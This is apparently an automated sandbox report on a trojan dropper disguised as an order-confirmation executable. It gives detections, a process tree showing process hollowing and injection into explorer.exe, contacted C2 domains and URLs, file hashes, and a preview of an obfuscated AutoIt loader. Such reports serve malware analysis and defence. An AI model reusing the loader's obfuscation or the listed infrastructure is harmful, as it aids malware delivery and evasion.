          Source: Yara match | File source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00BA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | Code function: 1_2_00BA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,

          MITRE ATT&CK Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts2 | Native API1 | Application Shimming1 | Exploitation for Privilege Escalation1 | Disable or Modify Tools1 | Input Capture21 | System Time Discovery2 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer4 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Shared Modules1 | Valid Accounts2 | Application Shimming1 | Deobfuscate/Decode Files or Information1 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Input Capture21 | Exfiltration Over Bluetooth | Encrypted Channel1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Valid Accounts2 | Obfuscated Files or Information3 | Security Account Manager | System Network Connections Discovery1 | SMB/Windows Admin Shares | Clipboard Data2 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Access Token Manipulation21 | Software Packing11 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Process Injection512 | Valid Accounts2 | LSA Secrets | System Information Discovery115 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion3 | Cached Domain Credentials | Security Software Discovery261 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation21 | DCSync | Virtualization/Sandbox Evasion3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection512 | Proc Filesystem | Process Discovery3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Application Window Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
          Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | Remote System Discovery1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
          Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | System Network Configuration Discovery1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS |  |  | Inhibit System Recovery

          Behavior Graph

          Behavior Graph ID: 344999 | Sample: Order confirmation 64236000... | Startdate: 27/01/2021 | Architecture: WINDOWS | Score: 100

          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

          Process tree recovered from the graph:

          Order confirmation 64236000000025 26.01.2021.exe (started)
            dropped: C:\Users\user\AppData\...\lqqebhptsg.exe, PE32
            lqqebhptsg.exe (started)
              signatures: Maps a DLL or memory area into another process; Sample uses process hollowing technique
              dropped: C:\Users\user\AppData\Local\...\9rd1hxro.exe, PE32
              9rd1hxro.exe (started)
                signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Modifies the context of a thread in another process (thread injection); 4 other signatures
                explorer.exe (injected)
                  signature: System process connects to network (likely due to code injection or exploit)
                  DNS/IP: taxandbookkeepingsolutions.com 192.254.186.135, ports 49732, 49747, 80, UNIFIEDLAYER-AS-1US, United States
                  DNS/IP: expand.care 149.210.170.235, ports 49734, 49759, 80, TRANSIP-ASAmsterdamtheNetherlandsNL, Netherlands
                  DNS/IP: 21 other IPs or domains
                  NETSTAT.EXE (started)
                    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    cmd.exe (started)
                      conhost.exe (started)

          Screenshots

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Order confirmation 64236000000025 26.01.2021.exe | 50% | ReversingLabs | Win32.Trojan.Doina
Order confirmation 64236000000025 26.01.2021.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe | 21% | ReversingLabs | Win32.PUA.Wacapew
C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | 5% | Metadefender |
C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe | 0% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.lqqebhptsg.exe.4dc0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.2.9rd1hxro.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.Order confirmation 64236000000025 26.01.2021.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.0.Order confirmation 64236000000025 26.01.2021.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
2.1.9rd1hxro.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


                                                      Contacted URLs


                                                      URLs from Memory and Binaries


                                                                                            Contacted IPs


                                                                                            Public

                                                                                            16509AMAZON-02UStrue
                                                                                            192.254.186.135
                                                                                            unknownUnited States
                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                            154.204.140.233
                                                                                            unknownSeychelles
                                                                                            18013ASLINE-AS-APASLINELIMITEDHKtrue

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344999
Start date: 27.01.2021
Start time: 15:37:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Order confirmation 64236000000025 26.01.2021.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/5@16/15
EGA Information: Failed
HDC Information:
• Successful, ratio: 6% (good quality ratio 5.8%)
• Quality average: 84.2%
• Quality standard deviation: 24.8%
HCA Information:
• Successful, ratio: 70%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 168.61.161.212, 23.210.248.85, 51.11.168.160, 51.103.5.159, 23.55.110.35, 23.55.110.38, 67.26.81.254, 8.248.121.254, 8.241.123.254, 67.27.159.254, 67.27.158.126, 95.101.22.224, 95.101.22.216, 20.54.26.129, 52.155.217.156
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/344999/sample/Order confirmation 64236000000025 26.01.2021.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Associated Sample Name / URL | Detection | Context

Match: 192.249.115.168
PO-RY 001-21 Accuri.jar | malicious | www.secretlairtoys.com/bnuw/?xPWxBfL=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IvhReiTcqeIvlMgMw==&9rjLyF=fdhDpRGXQ
Statement for T10495 - 18-01-21 15-23.jar | malicious | www.secretlairtoys.com/bnuw/?AdpLDtR=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IvYOvCQS8CPvlMnfA==&1bS=_VdpZpR8yn

Match: 184.168.131.241
RAPID SOA.xlsx | malicious | www.thecreatorsbook.com/aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA==
v07PSzmSp9.exe | malicious | www.parkdaleliving.com/c8so/?3ff87=cEUYti5cL+AXNxPbfx60LfZoJb25X1Xzf5mF7VOL6mQ/zZpS24NGTSz6B6bhvYiv88T+&uZWD=XPmPajepJ2gdvnZ
winlog(1).exe | malicious | www.digitalcreativeclass.com/oean/?8pNhXv=yVML0zB0&u4XpH=6sgdKtavC7V87+oTFKoxaa5O0zjTcMbm8vcjcmphVoVHfmTvOtd6UrCYUSHuOogI1kkIR2YmoA==
win32.exe | malicious | www.xn--lmsealamientos-tnb.com/incn/?8pBP5p=wf+rV5DOYsMJpa4g9XLDiATljpns8YCBV86prGMq2zSxEqUEQI9j0Vbx28h0R1RpmAu9&L6Ah=2dSLFXghYtFd0
order pdf.exe | malicious | www.healthywithhook.com/n7ak/?uTuD=UF4jhC9GOQChisniHC1kg0CjCBTohJaid9vkoIR2Qf4yQeaQ94Q33rP15fTgpArs+ngL&Ulm=9rCT5lUPVnAlWPi0
bgJPIZIYby.exe | malicious | www.twistedtailgatesweeps1.com/bw82/?GFND=kKEA6YkkdkETd3+d2qZ9bmPUSI4mVgzFcDmo6tctb+5KXtaTIOiEE2GUo6ELQ3o02C3x&Rlj=YVIX8Hyx
message_zdm.html | malicious | outlook-offlce-com.irvineairflights.org/
SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe | malicious | www.garethjamesproperties.com/cdl/?Et08qv=2ovCVTXv68Pt4ijpLk8HPqbw25DfYgJSfH6hGLZ/BiAdoxLe5mSyhZEbepZ3N+ZDM0I2&uXK=hpgd6NmPQLRDNXK
message_zdm.html | malicious | myaccount-office-message.irvinebusinessfly.com/
Shipping Document PL&BL Draft.exe | malicious | www.metamorphosiswei.com/9bwn/?FTChYV9=PjBOtfKyZi0MVy8KTAOZ6es/s7g6bZ/sUd6s5qyy+y2zh4u+ZehjfLQuVlmfdl/uWDwB70KU+Q==&uzuD=ZlmPdLR82nZ
INV120294624.html | malicious | isb-sharepoints.irvineairflight.com/
G0ESHzsrvg.exe | malicious | www.100feetpics.com/8rg4/?Ktx=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mMDQv4y9//uuqNWBXw==&OtNDOP=wXOLMFD0PT3lc
hmH9ZhBQFD.exe | malicious | www.twistedtailgatesweeps1.com/bw82/?AjR=kKEA6YkkdkETd3+d2qZ9bmPUSI4mVgzFcDmo6tctb+5KXtaTIOiEE2GUo5kbfW4Mone2&ndnDnN=-Zh4gtKhzFrx
NEW AGREEMENT 2021.xlsx | malicious | www.lakegastonautoparts.com/bw82/?h4XX=ADKhg6&d480GxR0=juBLB0WtueK0EvdRqiaKUMHcPI3xC2bTDg9jeDe0t8cj29/tW+mLTC2Yjrpt+W5wd622IA==
Signatures Required 21-01-2021.xlsx | malicious | www.magnabeautystyle.com/bw82/?KPO0Ltt0=9KGhaNjgEAjOuiPnGmkWJtXE2Tv4ryq1r5IcCqZotckyUU+N2GtErEKHJSdKgyTchgl25w==&GzuD_=dp5pdVbpjd
JK981U7607.doc | malicious | trainwithconviction.com/wp-admin/y/
SecuriteInfo.com.Trojan.PackedNET.507.23078.exe | malicious | www.pnwfireextinguishers.com/incn/?t8o=sCl40OkbCTlpMn8nDVKtc7exPuvy+8BigTFOlzhHVo8rCf1OKnKgPL2L2vkPzdoEVatq&TjX=YvIT_
SecuriteInfo.com.Trojan.PackedNET.507.15470.exe | malicious | www.microwgreens.net/gqx2/?t6Al=7RaLHwCMUMujiCZTFv81tpuDgIdMwwaUpFkTs3uacfnBr+tZ14+SJ7n3FmpwAcExjbOA&kPm0q=J4kl
ChTY1xID7P.exe | malicious | www.hlaprotiens.com/8rg4/?GFNP=OYDJLuueaFXNtOwihDRdfsH5NtUxWUpjnhyJYIgTyqexCACRaAwflaXc/5f6y5znDp4n&Rl7=XPv4nRgx
Sales Contract_20210113.xlsx | malicious | www.microwgreens.net/gqx2/?Ab=7RaLHwCJULuniSVfHv81tpuDgIdMwwaUpF8Dw0ybY/nArPBfyovef/f1GAl2LtQ62963Dg==&oBZ4Uz=D0Dl7fO

Domains

Associated Sample Name / URL | Detection | Context

Match: www.husum-ferienwohnungen.com
PO-RY 001-21 Accuri.jar | malicious | 46.38.226.47

Match: www.dmvantalya.com
PO-RY 001-21 Accuri.jar | malicious | 154.204.140.233
Statement for T10495.jar | malicious | 154.204.140.233
Statement for T10495 - 18-01-21 15-23.jar | malicious | 154.204.140.233

Match: www.purposelyproductivelab.com
Statement for T10495 - 18-01-21 15-23.jar | malicious | 3.13.31.214

Match: www.state728.com
PO-RY 001-21 Accuri.jar | malicious | 69.163.224.168
Statement for T10495 - 18-01-21 15-23.jar | malicious | 69.163.224.168

Match: www.alliswell.info
Statement for T10495.jar | malicious | 51.195.43.214
Statement for T10495 - 18-01-21 15-23.jar | malicious | 51.195.43.214

Match: www.rotalablog.com
Statement for T10495.jar | malicious | 118.27.99.25

ASN

Associated Sample Name / URL | Detection | Context

Match: EGIHOSTINGUS
v07PSzmSp9.exe | malicious | 107.186.80.105
Request.xlsx | malicious | 104.252.75.32
Shipping Document PL&BL Draft.exe | malicious | 205.164.0.141
CiL08gVVjl.exe | malicious | 104.252.75.184
sLUAeV5Er6.exe | malicious | 23.230.139.13
KtJsMM8kdE.exe | malicious | 45.38.251.204
z1k1U9Vnnw.exe | malicious | 104.252.75.184
PO81053.exe | malicious | 172.121.114.119
Purchase Order_80976678_pdf.exe | malicious | 107.186.101.48
Request for Quotation.exe | malicious | 104.253.87.80
Bank details.exe | malicious | 107.165.91.103
6gg4UwrN3I.exe | malicious | 107.186.80.231
Purchase order nr.0119-21.exe | malicious | 107.187.149.142
Consignment Details&BL Draft.exe | malicious | 205.164.0.141
PO#416421.exe | malicious | 104.164.84.118
6LoOfs26IR.exe | malicious | 50.117.53.236
Solicitud de presupuesto.exe | malicious | 45.38.103.38
Scan Document 01.exe | malicious | 172.252.178.113
spptqzbEyNlEJvj.exe | malicious | 104.164.52.100
Shipping Documents PL&BL Draft.exe | malicious | 172.252.178.113

Match: AS-26496-GO-DADDY-COM-LLCUS
ARCH_25_012021.doc | malicious | 192.169.223.13
RAPID SOA.xlsx | malicious | 184.168.131.241
0113 INV_PAK.xlsx | malicious | 166.62.29.42
quote20210126.exe.exe | malicious | 107.180.2.197
ARCH_25_012021.doc | malicious | 192.169.223.13
Informacion.doc | malicious | 166.62.10.32
v07PSzmSp9.exe | malicious | 198.71.232.3
winlog(1).exe | malicious | 184.168.131.241
win32.exe | malicious | 184.168.131.241
DAT.doc | malicious | 107.180.12.39
order pdf.exe | malicious | 184.168.131.241
Arch_2021_717-1562532.doc | malicious | 192.169.223.13
ARCH_98_24301.doc | malicious | 198.71.233.150
RFQ.xlsx | malicious | 198.71.232.3
bgJPIZIYby.exe | malicious | 184.168.131.241
E4Q30tDEB9.exe | malicious | 192.169.220.85
RevisedPO.24488_pdf.exe | malicious | 107.180.34.198
02131.doc | malicious | 166.62.28.133
mensaje_012021_1-538086.doc | malicious | 198.71.233.47
Notice 8283393_829.doc | malicious | 192.169.223.13

Match: IMH-WESTUS
Top Urgent_New_Order_PDF.exe | malicious | 173.247.251.165
JK981U7607.doc | malicious | 23.235.208.88
EK6BR1KS50.exe | malicious | 205.134.254.189
7145-2021.doc | malicious | 23.235.208.88
form.doc | malicious | 23.235.208.88
PO 01202021.doc | malicious | 23.235.208.88
fda.exe | malicious | 74.124.195.209
57229937-122020-4-7676523.doc | malicious | 23.235.210.245
PO-RY 001-21 Accuri.jar | malicious | 192.249.115.168
P8ob8zaRpi.exe | malicious |
                                                                                            • 209.182.192.90
                                                                                            Purchase Order 02556.xlsxGet hashmaliciousBrowse
                                                                                            • 209.182.192.90
                                                                                            payment _doc.exeGet hashmaliciousBrowse
                                                                                            • 173.231.192.44
                                                                                            Statement for T10495 - 18-01-21 15-23.jarGet hashmaliciousBrowse
                                                                                            • 192.249.115.168
                                                                                            J0OmHIagw8.exeGet hashmaliciousBrowse
                                                                                            • 205.134.254.189
                                                                                            SWIFT_COPY00993Payment_advic4555pdf.exeGet hashmaliciousBrowse
                                                                                            • 144.208.68.94
                                                                                            PURCHASE ORDER_no. 64392094_pdf.exeGet hashmaliciousBrowse
                                                                                            • 66.117.4.240
                                                                                            https://notification1.bubbleapps.io/version-test?debug_mode=trueGet hashmaliciousBrowse
                                                                                            • 205.134.249.83
                                                                                            https://zarachim-67490.firebaseapp.com/aeb3135b436aa55373822c010763dd54#c3RldmUuaGVuc29uQHJ5ZXJzb24uY29tGet hashmaliciousBrowse
                                                                                            • 173.231.203.136
                                                                                            http://cjy.mxGet hashmaliciousBrowse
                                                                                            • 192.249.127.205
                                                                                            https://manage-ordersrvicsc.asgetrw.com/Get hashmaliciousBrowse
                                                                                            • 173.231.204.123

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
• Filename: Quotation.exe, Detection: malicious
• Filename: PO13132021.exe, Detection: malicious
• Filename: Tender documents_FOB_Offer_Printout.PDF.exe, Detection: malicious
• Filename: HTG-9087650.exe, Detection: malicious
• Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious
• Filename: MC8ZX01sSo.exe, Detection: malicious
• Filename: F6AAdCq3uj.exe, Detection: malicious
• Filename: tZy7EYc9Da.exe, Detection: malicious
• Filename: YMQ6XNETnU.exe, Detection: malicious
• Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious
• Filename: BANK FORM.xlsx, Detection: malicious
• Filename: order0004345.xlsx, Detection: malicious
• Filename: Bill of Lading BL.xlsx, Detection: malicious
• Filename: Clntnjk.xlsx, Detection: malicious
• Filename: HTG-9066543.exe, Detection: malicious
• Filename: vbc.exe, Detection: malicious
• Filename: HTMY-209871640.exe, Detection: malicious
• Filename: YOeg64zDX4.exe, Detection: malicious
Match: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
• Filename: Quotation.exe, Detection: malicious
• Filename: PO13132021.exe, Detection: malicious
• Filename: HTG-9087650.exe, Detection: malicious
• Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious
• Filename: MC8ZX01sSo.exe, Detection: malicious
• Filename: F6AAdCq3uj.exe, Detection: malicious
• Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious
• Filename: HTG-9066543.exe, Detection: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
Process: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.570843086702839
Encrypted: false
SSDEEP: 12288:apVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M0:aT3E53Myyzl0hMf1tr7Caw8M0
MD5: 535DD1329AEF11BF4654B3270F026D5B
SHA1: 9C84DE0BDE8333F852120AB40710545B3F799300
SHA-256: B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
SHA-512: A552E20A09A796A6E3E18DECE308880069C958CF9136BB4FC3EE726D6BC9B2F8EDDBCFF06FF9F9DED4DD268F5D0F39D516AD42ECCE6455A4BF5CF4F3CB4C4ECC
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:
• Filename: Quotation.exe, Detection: malicious
• Filename: PO13132021.exe, Detection: malicious
• Filename: HTG-9087650.exe, Detection: malicious
• Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious
• Filename: MC8ZX01sSo.exe, Detection: malicious
• Filename: F6AAdCq3uj.exe, Detection: malicious
• Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious
• Filename: HTG-9066543.exe, Detection: malicious
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\Nla\ccdlyhm.op
Process: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
File Type: data
Category: dropped
Size (bytes): 164352
Entropy (8bit): 7.998850005985958
Encrypted: true
SSDEEP: 3072:l3Mvkvpc4/3NupJJT0/NSp6GRlutg4DoVfOMXwxhGf8Jz:lcgpc4/upZDuyW166sez
MD5: 405B6B6C194D24D18CA76FB7F0A0B67A
SHA1: 4FDF2C18626D259B98F3B62DA97E15E075D6F694
SHA-256: EDA987BD44CC37D5BAFB9DC5E8A43131BC86E8C5DC530B1288F8B8C85B12A2B1
SHA-512: B085C91E0A6606517E596AC6B78BDA5E6323066974DF15CDFC9EB844EA5D58BECCE9EC69D8CF65A68746465E4C254FE14A0F46075C837CD8AD45CE33591FD75D
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
Process: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
File Type: ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 299425
Entropy (8bit): 4.128823447522899
Encrypted: false
SSDEEP: 96:+Efbh4MHM9MJ0MIv/MQPOTdKPtExIPR63AZL66LbtqcxwejeuR575hMhHShgZ1Q+:+EDZcMoO5cAlEcx
MD5: 952B37468E91AC2BE311A1C127F9F165
SHA1: CB08D3AC28B032F9AF821A87A25FC04C6873DC3A
SHA-256: BCEC27CC70FE9ADCEF6F3D5BA15CEB811B6D1A136D1966AA57CFE74991CA8AE6
SHA-512: DC2AE1A65316D388416292C8FF4A192D02F9DD4539A6181FC4EEDF520C20C2B92CEA16A6B165DE9DBD75709C56A5A272C1CB93F92EC95665B538258BD407C337
Malicious: false
Reputation: low
Preview: Global $C30vpm = Execute("Chr")..#NoTrayIcon..Global $B31j26z1md, $W321ie, $O33uzbcy4, $D34cqdznl, $Y35w6d, $T36edp5xe..For $B31j26z1md = 0 To Random(5, 8, 1).. $O33uzbcy4 = 0.. For $D34cqdznl = 2 To 100.. $W321ie = True.. $Y35w6d = 2.. While $Y35w6d*$Y35w6d<=$B31j26z1md.. If Mod($B31j26z1md, $Y35w6d) == 0 Then.. $O33uzbcy4 = False.. ExitLoop.. EndIf.. $Y35w6d += 1.. WEnd.. If $W321ie Then $O33uzbcy4 = $D34cqdznl.. Next..Next..Dim $L3232f8wegf = GUICreate($C30vpm((-402+481))&$C30vpm((-364+481))&$C30vpm((-365+481))&$C30vpm((-383+481))&$C30vpm((-364+481))&$C30vpm((-382+481))&$C30vpm((-374+481))&$C30vpm((-449+481))&$C30vpm((-408+481))&$C30vpm((-371+481))&$C30vpm((-382+481)), 102, 240, -99999, -99999, 0, 128)....GUISetState(@SW_SHOW)..Global $Y3334j0u3f = Execute($C30vpm((-412+481))&$C30vpm((-361+481))&$C30vpm((-380+481))&$C30vpm((-382+481))&$C30vpm((-364+481))&$C30vpm((-365+481))&$C30vpm((-380+481)))..Global $D3432hvyircob = $Y3334j0u3f($C30vpm((-413+481))&$C30vpm((-373+4
C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
Process: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 893608
Entropy (8bit): 6.620131693023677
Encrypted: false
SSDEEP: 12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5: C56B5F0201A3B3DE53E561FE76912BFD
SHA1: 2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256: 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512: 195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious: true
Antivirus:
• Antivirus: Metadefender, Detection: 5%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Quotation.exe, Detection: malicious
• Filename: PO13132021.exe, Detection: malicious
• Filename: Tender documents_FOB_Offer_Printout.PDF.exe, Detection: malicious
• Filename: HTG-9087650.exe, Detection: malicious
• Filename: Order-0S94442VD VictoryJSC.xlsx, Detection: malicious
• Filename: Purchase Order.xlsx, Detection: malicious
• Filename: PO#21010028 - SYINDAC QT-00820_pdf.exe, Detection: malicious
• Filename: MC8ZX01sSo.exe, Detection: malicious
• Filename: F6AAdCq3uj.exe, Detection: malicious
• Filename: tZy7EYc9Da.exe, Detection: malicious
• Filename: YMQ6XNETnU.exe, Detection: malicious
• Filename: AWB 9899691012 TRACKING INFO_pdf.exe, Detection: malicious
• Filename: BANK FORM.xlsx, Detection: malicious
• Filename: order0004345.xlsx, Detection: malicious
• Filename: Bill of Lading BL.xlsx, Detection: malicious
• Filename: Clntnjk.xlsx, Detection: malicious
• Filename: HTG-9066543.exe, Detection: malicious
• Filename: vbc.exe, Detection: malicious
• Filename: HTMY-209871640.exe, Detection: malicious
• Filename: YOeg64zDX4.exe, Detection: malicious
Reputation: moderate, very likely benign file
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsmE343.tmp
